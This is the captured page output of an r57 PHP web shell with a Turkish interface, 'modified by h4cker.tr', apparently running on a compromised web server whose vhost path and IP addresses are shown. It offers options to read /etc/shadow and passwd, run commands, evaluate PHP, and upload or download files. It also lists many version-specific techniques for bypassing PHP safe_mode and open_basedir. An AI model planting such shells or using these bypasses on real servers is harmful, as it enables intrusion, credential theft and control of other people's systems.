G?°F89;a r57 bypass shell | modified by h4cker.tr
  #r57 shell 1.43
   edited by h4cker.tr
  16-11-2012 02:31:18 Your IP: [204.236.235.245] Server IP: [212.58.2.56]
  PHP version: 5.1.6  cURL: ON  MySQL: ON  MSSQL: Kapali  PostgreSQL: Kapali  Oracle: Kapali
  Safe_mode: ON  Open_basedir: NONE  Safe_mode_exec_dir: NONE  Safe_mode_include_dir: NONE
  Disable functions : exec,passthru,shell_exec,system,proc_open,popen,show_source
  Free space : 266.23 GB Total space: 331.01 GB
  
  [ phpinfo ]  [ php.ini ]  [ cpu ]  [ mem ]  [ syslog ]  [ resolv ]  [ hosts ]  [ shadow ]  [ passwd ]  [ tmp ]  [ delete ]
uname -a : 
sysctl : 
$OSTYPE : 
Server : 
id : 
pwd : 

   deleted
   -
   
   Apache/2.2.3 (CentOS)
   deleted
   /var/www/vhosts/iamcr2011istanbul.com/httpdocs/asd   ( drwxr-xr-x )
Komut Uygula: safe_dir
:: Guvenlik Modunda Calis ::
Calisma Dizini 4     
:: Dosya Duzenle ::
Dosya Duzenlemek icin 4     
:: Olustur/Sil Dosya/Dizin ::
isim 4            
:: Modify/Access date(touch) ::
:: Chown/Chgrp/Chmod ::
:: Dosyalarda ki Metni Bul ::
:: PHP Kod Degerlendir ::
:: Includes fonksiyonu ile Guvenlik modunu atlamayi test et. ::
:: Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4) ::
Cat file 4     
:: Mysql da ki yukleme dosyasi ile Guvenlik modunu atlamayi test et. ::
Database[VeriTabani] 4     Kullanici 4    Sifre 4    Port 4
Cat file 4     
:: Test bypass safe_mode with function mb_send_mail (PHP <= 4.0-4.2.2, 5.x) ::
Cat file 4     
:: Test bypass safe_mode, view dir list via imap_list (PHP <= 5.1.2) ::
Calisma Dizini 4     
:: Test bypass safe_mode, view file contest via imap_body (PHP <= 5.1.2) ::
Cat file 4     
:: Test bypass safe_mode, copy file via copy[compress.zlib://] (PHP <= 4.4.2, 5.1.2) ::
Copy from 4
to 4     
:: Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST ::
Cat file 4     
:: Test bypass open_basedir, view dir list via glob (PHP <= 5.2.x) ::
Calisma Dizini 4     
:: Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1) ::
:: Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1) ::
:: Test bypass open_basedir, add data to file via error_log[php://] (PHP <= 5.1.4, 4.4.2) ::
:: Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0) ::
:: Test bypass open_basedir, add data to file via readfile[php://] (PHP <= 5.2.1, 4.4.4) ::
:: Test bypass open_basedir, create file via fopen[srpath://] (PHP v5.2.0) ::
:: Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1) ::
Cat file 4
:: Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1) ::
Calisma Dizini 4
:: Servere Dosya Upload Et ::
Yerel Dosya 4
 Yeni ad 4     
:: Multy Servere Dosya Upload Et ::
:: Download files from server ::
Dosya 4     
Archivation 4 without arch. zip gzip bzip
:: FTP ::